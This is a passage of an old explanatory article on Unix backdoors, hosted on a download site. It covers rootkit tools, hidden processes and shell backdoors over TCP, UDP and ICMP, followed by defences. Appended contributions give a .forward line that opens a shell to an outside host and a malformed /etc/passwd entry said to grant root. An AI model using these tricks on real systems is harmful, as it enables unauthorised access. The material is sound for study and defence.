⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 backdoors.txt

📁 黑客培训教程
💻 TXT
📖 第 1 页 / 共 2 页
字号:
An intruder could rename the sniffer program to a legitimate service likein.syslog and run it.  Thus when an administrator does a "ps" or looks atwhat is running, the standard service names appear.An intruder could modify the library routines so that "ps" does not showall the processes.An intruder could patch a backdoor or program into an interrupt drivenroutine so it does not appear in the process table.  An example backdoorusing this technique is amod.tar.gz available on http://star.niimm.spb.su/~maillist/bugtraq.1/0777.htmlAn intruder could modify the kernel to hide certain processes as well.RootkitOne of the most popular packages to install backdoors is rootkit.  It caneasily be located using Web search engines.  From the Rootkit README, hereare the typical files that get installed:z2 - removes entries from utmp, wtmp, and lastlog.Es - rokstar's ethernet sniffer for sun4 based kernels.Fix - try to fake checksums, install with same dates/perms/u/g.Sl - become root via a magic password sent to login.Ic - modified ifconfig to remove PROMISC flag from output.ps: - hides the processes.Ns - modified netstat to hide connections to certain machines.Ls - hides certain directories and files from being listed.du5 - hides how much space is being used on your hard drive.ls5 -  hides certain files and directories from being listed.Network traffic backdoorsNot only do intruders want to hide their tracks on the machine, but alsothey want to hide their network traffic as much as possible.  These networktraffic backdoors sometimes allow an intruder to gain access through afirewall.  There are many network backdoor programs that allow an intruderto set up on a certain port number on a machine that will allow accesswithout ever going through the normal services.  Because the traffic isgoing to a non-standard network port, the administrator can overlook theintruder's traffic.  These network traffic backdoors are typically usingTCP, UDP, and ICMP, but it could be many other kinds of packets.TCP Shell BackdoorsThe intruder can set up these TCP Shell backdoors on some high port numberpossibly where the firewall is not blocking that TCP port.  Many times,they will be protected with a password just so that an administrator thatconnects to it, will not immediately see shell access.  An administratorcan look for these connections with netstat to see what ports are listeningand where current connections are going to and from.  Many times, thesebackdoors allow an intruder to get past TCP Wrapper technology.  Thesebackdoors could be run on the SMTP port, which many firewalls allow trafficto pass for e-mail.UDP Shell BackdoorsAdministrator many times can spot a TCP connection and notice the oddbehavior, while UDP shell backdoors lack any connection so netstat wouldnot show an intruder accessing the Unix machine.  Many firewalls have beenconfigured to allow UDP packets for services like DNS through.  Many times,intruders will place the UDP Shell backdoor on that port and it will beallowed to by-pass the firewall.ICMP Shell BackdoorsPing is one of the most common ways to find out if a machine is alive bysending and receiving ICMP packets.  Many firewalls allow outsiders to pinginternal machines.  An intruder can put data in the Ping ICMP packets andtunnel a shell between the pinging machines.  An administrator may notice aflurry of Ping packets, but unless the administrator looks at the data inthe packets, an intruder can be unnoticed.Encrypted LinkAn administrator can set up a sniffer trying to see data appears as someoneaccessing a shell, but an intruder can add encryption to the Networktraffic backdoors and it becomes almost impossible to determine what isactually being transmitted between two machines.Windows NTBecause Windows NT does not easily allow multiple users on a single machineand remote access similar as Unix, it becomes harder for the intruder tobreak into Windows NT, install a backdoor, and launch an attack from it.Thus you will find more frequently network attacks that are spring boardedfrom a Unix box than Windows NT. As Windows NT advances in multi-usertechnologies, this may give a higher frequency of intruders who use WindowsNT to their advantage.  And if this does happen, many of the concepts fromUnix backdoors can be ported to Windows NT and administrators can be readyfor the intruder.  Today, there are already telnet daemons available forWindows NT.  With Network Traffic backdoors, they are very feasible forintruders to install on Windows NT.SolutionsAs backdoor technology advances, it becomes even harder for administratorsto determine if an intruder has gotten in or if they have been successfullylocked out.AssessmentOne of the first steps in being proactive is to assess how vulnerable yournetwork is, thus being able to figure out what holes exist that should befixed.  Many commercial tools exist to help scan and audit the network andsystems for vulnerabilities.  Many companies could dramatically improvetheir security if they only installed the security patches made freelyavailable by their vendors.MD5 BaselinesOne necessary component of a system scanner is MD5 checksum baselines. This MD5 baseline should be built up before a hacker attack with cleansystems.  Once a hacker is in and has installed backdoors, trying to createa baseline after the fact could incorporate the backdoors into thebaseline.  Several companies had been hacked and had backdoors installed ontheir systems for many months. Overtime, all the backups of the systemscontained the backdoors.   When some of these companies found out they hada hacker, they restored a backup in hopes of removing any backdoors.  Theeffort was futile since they were restoring all the files, even thebackdoored ones.  The binary baseline comparison needs to be done before anattack happens.Intrusion detectionIntrusion detection is becoming more important as organizations are hookingup and allowing connections to some of their machines.  Most of the olderintrusion detection technology was log-based events.  The latest intrusiondetection system (IDS) technology is based on real-time sniffing andnetwork traffic security analysis.  Many of the network traffic backdoorscan now easily be detected.  The latest IDS technology can take a look atthe DNS UDP packets and determine if it matches the DNS protocol requests. If the data on the DNS port does not match the DNS protocol, an alert flagcan be signaled and the data captured for further analysis.   The sameprinciple can be applied to the data in an ICMP packet to see if it is thenormal ping data or if it is carrying encrypted shell session.Boot from CD-ROM.Some administrators may want to consider booting from CD-ROM thuseliminating the possibility of an intruder installing a backdoor on theCD-ROM.  The problem with this method is the cost and time of implementingthis solution enterprise wide.VigilantBecause the security field is changing so fast, with new vulnerabilitiesbeing announced daily and intruders are constantly designing new attack andbackdoor techniques, no security technology is effective without vigilance.Be aware that no defense is foolproof, and that there is no substitute fordiligent attention.-------------------------------------------------------------------------you may want to add:    .forward Backdoor    On Unix machines, placing commands into the .forward file was also    a common method of regaining access.  For the account ``username''    a .forward file might be constructed as follows:        \username        |"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"    permutations of this method include alteration of the systems mail    aliases file (most commonly located at /etc/aliases).  Note that    this is a simple permutation, the more advanced  can run a simple    script from the forward file that can take arbitrary commands via    stdin (after minor preprocessing).PS: The above method is also useful gaining access a companies        mailhub (assuming there is a shared a home directory FS on        the client and server).> Using smrsh can effectively negate this backdoor (although it's quite> possibly still a problem if you allow things like elm's filter or> procmail which can run programs themselves...).---------------------------------------------------------------------------you may want to add this "feature" that can act as a backdoor:when specifying a wrong uid/gid in the /etc/password file,most login(1) implementations will fail to detect the wronguid/gid and atoi(3) will set uid/gid to 0, giving superuserprivileges.example:rmartin:x:x50:50:R. Martin:/home/rmartin:/bin/tcshon Linux boxes, this will give uid 0 to user rmartin.

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -